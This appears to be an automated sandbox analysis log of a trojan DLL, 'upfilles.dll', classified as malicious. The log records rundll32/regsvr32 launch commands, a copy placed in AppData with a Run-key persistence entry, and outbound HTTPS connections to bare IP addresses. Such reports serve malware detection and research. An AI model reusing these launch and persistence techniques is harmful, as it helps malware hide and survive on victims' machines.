Source: explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: unknown | HTTPS traffic detected: 91.194.11.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 138.124.183.215:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 54.175.181.104:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 95.164.68.73:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.155:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800012B0 NtConnectPort,NtRequestWaitReplyPort,NtRequestPort
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180001490 NtCreateSection,LocalAlloc,LocalAlloc,NtConnectPort,NtRequestWaitReplyPort
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180001650 RtlInitUnicodeString,NtClose,NtClose,RtlNtStatusToDosError,SetLastError,LocalFree,LocalFree,LocalFree,LocalFree
Source: C:\Windows\System32\rundll32.exe | Code function: 18_3_000002921300D31C NtProtectVirtualMemory
Source: C:\Windows\System32\rundll32.exe | Code function: 18_3_000002921300D2AC NtAllocateVirtualMemory
Source: C:\Windows\explorer.exe | Code function: 22_2_013A6814 NtFreeVirtualMemory
Source: C:\Windows\explorer.exe | Code function: 22_2_013A958C NtAllocateVirtualMemory
Source: C:\Windows\explorer.exe | Code function: 22_2_013AA5CC NtDelayExecution
Source: C:\Windows\explorer.exe | Code function: 22_2_013A6728 NtWriteFile
Source: C:\Windows\explorer.exe | Code function: 22_2_013A6618 RtlInitUnicodeString,NtCreateFile
Source: C:\Windows\explorer.exe | Code function: 22_2_013A650C RtlInitUnicodeString,NtCreateFile,NtClose
Source: C:\Windows\explorer.exe | Code function: 22_2_013A6464 RtlInitUnicodeString,NtOpenFile,NtClose
Source: C:\Windows\explorer.exe | Code function: 22_2_013A67A0 NtClose
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018001C030
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000A040
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800190AC
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180001950
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000B992
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800131E0
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000E200
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000B210
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800192B8
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180020B88
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180004C00
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180013448
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018001C45C
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000C480
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018001EC90
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800154A0
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180023584
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800176FC
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000292116E254C
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000000026E7DFB4C
Source: C:\Windows\explorer.exe | Code function: 22_2_013A1030
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
Source: upfilles.dll.dll | Binary or memory string: OriginalFilenameeppcom64.dllZ vs upfilles.dll.dll
Source: classification engine | Classification label: mal100.troj.evad.winDLL@32/17@8/6
Source: C:\Windows\System32\rundll32.exe | Code function: 18_3_00007DF4F0240000 CreateToolhelp32Snapshot,Process32First,Process32Next
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000AEB0 CoCreateInstance
Source: C:\Windows\System32\rundll32.exe | Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7272
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7288
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6324
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6516
Source: C:\Windows\System32\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\ba1d38a4-2e70-4cdd-8ce4-6f972928d4e8
Source: upfilles.dll.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll64.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: upfilles.dll.dll | ReversingLabs: Detection: 15%
Source: unknown | Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\upfilles.dll.dll"
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6516 -s 344
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7272 -s 344
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7288 -s 344
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
Source: C:\Windows\System32\loaddll64.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll64.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: upfilles.dll.dll | Static PE information: Image base 0x180000000 > 0x60000000
Source: upfilles.dll.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: upfilles.dll.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: upfilles.dll.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: upfilles.dll.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: upfilles.dll.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: upfilles.dll.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: upfilles.dll.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: X:\Gitlab\Builds\e945be61\0\lab\protectionplatform\Output\Release\x64\eppcom64.pdb source: rundll32.exe, 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1803925725.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1853230060.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1842561236.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.2936902948.0000000180025000.00000002.00000001.01000000.00000003.sdmp, upfilles.dll.dll
Source: upfilles.dll.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: upfilles.dll.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: upfilles.dll.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: upfilles.dll.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: upfilles.dll.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: upfilles.dll.dll | Static PE information: real checksum: 0x491bb should be: 0x85fc5
Source: upfilles.dll.dll | Static PE information: section name: hVr
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180006138 push E8000020h; iretd 6_2_000000018000613D
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000292116A5BB0 push r15; ret 18_2_00000292116A5BB5
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000000026E7A31B0 push r15; ret 18_2_000000026E7A31B5
Source: C:\Windows\System32\rundll32.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180023584 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
